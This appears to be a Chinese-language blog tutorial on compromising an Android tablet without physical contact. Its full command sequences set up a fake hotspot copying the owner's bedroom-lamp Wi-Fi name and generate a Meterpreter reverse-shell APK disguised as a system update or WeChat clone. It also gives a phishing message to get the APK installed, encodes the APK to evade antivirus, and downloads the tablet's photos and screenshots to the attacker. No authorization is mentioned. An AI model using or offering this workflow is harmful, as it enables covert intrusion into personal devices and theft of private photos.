平板无线渗透测试全流程(实战级,无物理接触)
无物理接触:全程通过网络钓鱼实现,符合真实渗透场景;隐蔽性高:目标主动连接热点 / 下载木马,无任何异常感知;可复用:同一热点可钓鱼多个设备(手机 / 平板 / 电视盒子)。
·
核心目标
通过 Kali 搭建钓鱼热点 / 利用现有 Wi-Fi,生成恶意 APK 并通过钓鱼方式让平板下载安装,远程获取 Meterpreter 会话,实现无物理接触的敏感数据窃取,掌握 Android 10 + 无线渗透边界。
测试环境
- 攻击机:Kali Linux(需带无线网卡,支持 AP 模式,如 RTL8812AU)
- 目标机:Android 13 平板(联发科芯片,仅需联网,无物理接触)
- 核心工具:Metasploit Framework、hostapd(热点搭建)、dnsmasq(DHCP 服务)、Python(简易钓鱼服务器)
第一阶段:实战级前期准备(无线环境搭建)
1.1 搭建 Kali 钓鱼热点(让目标主动连你的网络)
步骤 1:关闭原有网络服务,避免冲突
bash
运行
# 关闭NetworkManager(防止干扰热点搭建)
systemctl stop NetworkManager
systemctl disable NetworkManager
# 关闭现有无线连接
ifconfig wlan0 down
步骤 2:配置热点参数(创建虚拟 AP)
bash
运行
# 配置wlan0为AP模式,设置热点IP(10.0.0.1/24)
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 up
# 启动hostapd(热点核心服务,伪装成常用Wi-Fi名)
cat > /tmp/hostapd.conf << EOF
interface=wlan0
driver=nl80211
ssid=Tenda_3EFBDO(卧室灯Wi-Fi名,伪装)
hw_mode=g
channel=6
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=12345678(伪装成目标常用密码)
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
EOF
# 启动热点
hostapd /tmp/hostapd.conf -B
步骤 3:启动 DHCP 服务(给连接的平板分配 IP)
bash
运行
# 配置dnsmasq(DHCP+DNS)
cat > /tmp/dnsmasq.conf << EOF
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.50,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
no-resolv
EOF
# 启动dnsmasq
dnsmasq -C /tmp/dnsmasq.conf -d &
验证热点:
平板端能搜到 “Tenda_3EFBDO” Wi-Fi,输入密码 12345678 可成功连接,平板获取 10.0.0.x 网段 IP(如 10.0.0.15)。
1.2 生成适配无线环境的恶意 APK(核心)
bash
运行
# LHOST设为Kali热点IP(10.0.0.1),LPORT自定义(4444)
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -o /var/www/html/Update.apk
# 关键:把木马放到Web目录,方便平板下载
# 启动简易HTTP服务器(让平板能访问http://10.0.0.1/Update.apk)
python3 -m http.server 80 --directory /var/www/html/ &
参数说明:
- LHOST:必须是 Kali 热点 IP(10.0.0.1),平板连热点后能直接访问;
- /var/www/html:Kali 默认 Web 目录,启动 HTTP 服务后,平板浏览器输入http://10.0.0.1/Update.apk即可下载木马;
- 伪装文件名:Update.apk(伪装成系统更新,降低警惕)。
第二阶段:社会工程学钓鱼(让目标主动下载安装木马)
2.1 钓鱼话术(模拟系统更新提示)
通过平板常用的聊天工具 / 邮件发送:
“你的平板系统有安全漏洞,点击链接下载更新包修复:http://10.0.0.1/Update.apk,安装后重启即可。”
2.2 平板端钓鱼操作(目标视角,模拟上钩)
- 平板连接 “Tenda_3EFBDO” 热点(以为是自家卧室灯 Wi-Fi);
- 打开浏览器,输入http://10.0.0.1/Update.apk,下载 Update.apk;
- 打开下载目录,点击安装(需允许 “未知来源应用”);
- 安装完成后点击 “打开”(触发木马运行,主动连回 Kali)。
第三阶段:无线监听上线(无物理接触获取会话)
3.1 Kali 端启动 Metasploit 监听
bash
运行
msfconsole -q
# 加载监听模块
use exploit/multi/handler
# 配置参数(与木马一致)
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 10.0.0.1(Kali热点IP)
set LPORT 4444
set ExitOnSession false
# 启动后台监听
run -j
3.2 会话建立验证(核心成功标志)
Kali 终端提示:
plaintext
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.15:56789)
✅ 说明:平板通过无线热点反向连接 Kali,无任何物理接触,实现远程控制。
第四阶段:无线后渗透测试(与原流程一致,无 USB)
4.1 系统信息探查
bash
运行
# meterpreter会话中执行
sysinfo(查看平板系统信息)
load appapi
app_list(查看安装的APP)
4.2 敏感数据窃取(无线下载,无物理接触)
bash
运行
# 下载平板照片/截图(核心成果)
download /sdcard/DCIM/ /root/Desktop/平板照片/
download /sdcard/Pictures/Screenshots/ /root/Desktop/平板截图/
# 解决文件查看问题(与原流程一致)
chmod -R 777 /root/Desktop/*
cd /root/Desktop/平板截图
eog *.png
4.3 权限壁垒测试(与原流程一致,明确边界)
- 尝试模拟输入 / 启动 APP 仍会触发 INJECT_EVENTS 权限报错(Android 10 + 核心壁垒);
- 无法读取短信 / 通讯录(需用户授权);
- 核心价值仍为 “隐蔽窃取外部存储数据”。
第五阶段:实战关键优化(解决无线渗透常见问题)
5.1 热点伪装优化(提高钓鱼成功率)
- 热点名:复制目标常用 Wi-Fi 名(如卧室灯 Wi-Fi),去掉密码或用弱密码;
- 木马伪装:将 Update.apk 重命名为 “微信分身.apk”“追剧神器.apk”,贴合目标使用习惯。
5.2 免杀处理(避免木马被安卓查杀)
bash
运行
# 给木马加壳,绕过安卓自带查杀
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -o /var/www/html/WeChat.apk -e x86/shikata_ga_nai -i 3
- -e:指定加密编码器;
- -i 3:加密次数,提高免杀率。
5.3 无线会话保活(防止断连)
bash
运行
# meterpreter中执行,保持会话稳定
set_auto_session_keepalive true
set_session_keepalive_interval 30(30秒心跳包)
第六阶段:实战总结(核心认知)
6.1 无线渗透核心价值
- 无物理接触:全程通过网络钓鱼实现,符合真实渗透场景;
- 隐蔽性高:目标主动连接热点 / 下载木马,无任何异常感知;
- 可复用:同一热点可钓鱼多个设备(手机 / 平板 / 电视盒子)。
6.2 渗透边界(与 USB 测试一致)
- 无 Root / 用户授权:仅能窃取外部存储(/sdcard)数据,无法控制 APP / 模拟输入;
- 免杀是关键:安卓自带查杀会拦截未加壳的 Metasploit 木马,需做免杀处理;
- 钓鱼是核心:技术只是手段,让目标 “主动上钩” 才是无线渗透的关键。
6.3 重复练习建议
- 重点练习 “热点搭建→木马生成→钓鱼下载→无线监听” 全流程,熟练掌握每个命令;
- 更换热点名 / 木马伪装名,测试不同钓鱼话术的成功率;
- 尝试用现有 Wi-Fi(无需搭建热点),将木马通过微信 / QQ 发送给平板,测试无线上线流程。
核心差异对比(USB 测试 vs 无线实战)
| 环节 | USB 测试(本地验证) | 无线实战(真实场景) |
|---|---|---|
| 木马传输方式 | USB 拖入 | 浏览器下载 / 聊天工具发送 |
| 网络环境 | 同一现有 Wi-Fi | 自建钓鱼热点 / 现有 Wi-Fi |
| 物理接触 | 必须 | 无 |
| 核心难点 | 权限壁垒 | 钓鱼成功率 + 木马免杀 |
| 实战价值 | 验证流程 | 贴近真实渗透 |
这个流程完全去掉了 USB 环节,聚焦 “无线攻击 + 钓鱼” 核心,符合你 “只要联网就能渗透” 的诉求。练习时重点掌握热点搭建、木马免杀、钓鱼话术设计,这三点是无线渗透的关键,也是区别于 “本地 USB 测试” 的核心技能。
更多推荐
所有评论(0)